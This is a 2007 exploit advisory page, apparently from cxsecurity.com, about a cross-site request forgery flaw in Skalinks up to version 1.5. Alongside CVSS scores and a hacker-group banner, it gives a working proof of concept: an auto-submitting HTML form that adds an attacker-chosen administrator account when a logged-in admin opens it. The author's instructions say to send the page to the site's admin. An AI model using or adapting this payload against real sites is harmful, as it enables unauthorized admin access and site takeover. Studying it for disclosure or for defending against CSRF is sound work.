Skalinks <= 1_5 Cross Site Request Forgery Add Admin

2007.11.10
Credit: djvincy
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################################## ## # _ _ _ _ _____ _ _ # # | | | | | | (_) |_ _| (_) | | # # | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ # # | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ # # | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ # # \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| # # __/ | # # |___/ # #_______________________________________________________________________ _# | | | Site: www.hackinginside.altervista.org | | Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin | | Author: Vincy | | Email: djvincy (at) hotmail (dot) it [email concealed] | |_______________________________________________________________________ _| This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info. It work only if admin's logged. ------------------------------------------------------------------------ ------------------- <form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post"> <input type="text" name="admin_name" value="[ NOME ]"> <input type="text" name="admin_password" value="[ PASSWORD ]"> <input type="text" name="admin_email" value="[ EMAIL ]"> <select name="admin_type"><option value="2">Super Editor</option></select> <input type=hidden name="Add_admin" value="Add Admin"> </form> <script>document.add_admin.submit()</script> ------------------------------------------------------------------------ ------------------- # Vincy - Hacking Inside Crew


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top